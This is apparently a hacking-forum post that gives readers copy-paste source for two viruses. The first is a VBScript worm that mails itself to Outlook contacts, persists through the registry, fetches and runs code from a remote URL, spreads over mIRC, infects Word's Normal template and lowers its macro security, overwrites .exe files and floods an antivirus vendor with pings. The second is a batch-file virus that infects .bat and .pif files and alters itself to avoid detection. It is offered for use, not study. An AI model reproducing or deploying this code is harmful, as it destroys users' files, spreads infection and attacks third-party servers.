First of all, some of you need to learn how
to read! Most good hacking techniques are in books, if hackers post really good techniques, they will be patched and he will be screwed!
anyway...
To make a DEADLY virus, open up notepad and
copy and paste the following...
'Serial Number : 0.7055475
'
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs")
f.Copy ("c:\folder\subfolder\...\anyname.vbs")
f.Copy ("c:\attachment.vbs")
f.Copy ("c:\attachment1.vbs")
end sub
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "")
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "freecell.exe") Or (s = "readme.txt") or (s = "license.txt") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe") Or (ext = "bat") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
msgbox "INFECTED", ,"DOOM"
'=========================================
'made by : Zero Cool
'worm name : INF3CTER
'=========================================
stop copying (do not copy this line!!)
now save the file as infecter.vbs on to your
desktop and/or anywhere else you please.
The next virus I am about to show you is a
polymorphic virus (hard to be picked up by
anti virus scanners)...
Open notepad and copy and paste the folowing...
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug<PiFV$$>nul
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit
stop copying (do not copy this line!!)
The above virus is extremely difficult for AV
scanners to detect, LOL!
Hav Fun!!
I'll be posting more techniques soon!
|